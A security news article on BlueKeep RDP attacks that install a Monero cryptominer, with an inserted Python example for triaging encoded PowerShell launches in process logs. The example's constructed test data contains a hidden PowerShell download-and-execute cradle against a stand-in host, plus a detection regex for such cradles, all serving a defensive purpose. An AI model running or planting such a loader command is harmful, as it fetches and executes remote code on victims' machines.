The RDP vulnerability BlueKeep in Windows Remote Desktop Services is currently being used by hackers for cryptomining. The attackers are exploiting vulnerable systems to mine cryptocurrency.
The attacks were observed through honeypots. The security researcher who discovered the attempts is Kevin Beaumont. The researcher noticed that many honeypots on his EternalPot RDP honeypot network began to "crash" and restart. The honeypots have been active for about half a year, and Saturday was the first time such a malfunction was observed. However, Beaumont noted that the machines in Australia did not "fail".
MalwareTech (online handle) examined the issues reported by Beaumont and concluded that the "crashing" was due to the BlueKeep vulnerability. MalwareTech said the attackers used the BlueKeep vulnerability to install a Monero miner.
MalwareTech's initial analysis showed that a first payload executes an encoded PowerShell command, which downloads a second encoded PowerShell script. The final payload is a cryptominer (probably for Monero).
According to the researcher, the malicious software is not a worm, but it exploits the BlueKeep vulnerability en masse. The researcher therefore concluded that the attackers were using one or more BlueKeep scanners, which help them find vulnerable systems, and then installing the cryptominer on them.
The researcher also said that the server used to exploit the vulnerability gets the target IP addresses from a predefined list.
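The first-stage loader described above is an encoded PowerShell command that fetches a second script. The following is an added example, not code from the article or from the researchers it cites: it decodes `-EncodedCommand` blobs found in process-creation log lines and flags the ones that contain a download-and-execute cradle, which is where a defender would first see this chain. The log lines are constructed for the example.

```python
import base64
import re
from typing import Optional

# Constructed sample process-creation log lines (Sysmon Event ID 1 / 4688 style).
# They are illustrative, not captured from the campaign described above.
def _enc(ps: str) -> str:
    """Encode a command the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(ps.encode("utf-16le")).decode("ascii")

SAMPLE_LOGS = [
    "CommandLine: powershell.exe -NoP -NonI -W Hidden -enc "
    + _enc("IEX (New-Object Net.WebClient).DownloadString('http://stage2.example.invalid/a.ps1')"),
    "CommandLine: powershell.exe -Command Get-Service",
    "CommandLine: powershell.exe -EncodedCommand " + _enc("Get-Date"),
]

# Matches -e, -ec, -enc, -encoded, -encodedcommand ... but not -ex / -ExecutionPolicy.
ENC_SWITCH = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)

# Strings typical of a download-and-execute stage, like the first-stage loader described above.
CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient"
    r"|Invoke-Expression|\bIEX\b|FromBase64String",
    re.IGNORECASE,
)

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENC_SWITCH.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        # Not valid base64, or an odd byte count that is not UTF-16LE: treat as no payload.
        return None

def triage(log_lines):
    """Decode every encoded PowerShell launch and flag the ones that look like a download cradle."""
    findings = []
    for line in log_lines:
        decoded = decode_encoded_command(line)
        if decoded is None:
            continue
        hits = sorted({h.group(0).lower() for h in CRADLE.finditer(decoded)})
        findings.append({"decoded": decoded, "indicators": hits, "download_cradle": bool(hits)})
    return findings
```

An encoded launch that decodes to nothing more than an ordinary cmdlet is reported but not flagged, so the output separates benign automation from loaders worth a closer look.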
A combination of cryptominer and BlueKeep scanner had also been reported in July. The malicious software that combined these two features was named Watchbog, and it mainly targeted Linux servers.
Intezer studied the malware at the time and found that the scanner integration "indicates that WatchBog is preparing a list of vulnerable systems that hackers will target in the future or sell to others."
However, according to MalwareTech, the current attacks are not related to the Watchbog malware.
BlueKeep: A brief history of the vulnerability
The BlueKeep vulnerability (CVE-2019-0708) made its appearance many months ago. Security experts rated it as critical, as it allows malware to spread to vulnerable systems without user intervention. Many governments and security companies began to warn of the vulnerability's severity, and Microsoft released a patch on 14 May.
Typically, exploiting this RDP vulnerability results in a "crash" of the target system. The researchers who created a working exploit tried to keep the details secret, so that hackers could not immediately create their own version and exploit unpatched systems.
Which versions of Windows are affected?
Fortunately, the BlueKeep vulnerability does not affect all versions of Windows. According to Microsoft, it affects Windows 7, Windows Server 2008 R2 and Windows Server 2008, and it is on these systems that attackers can exploit it to install a cryptominer.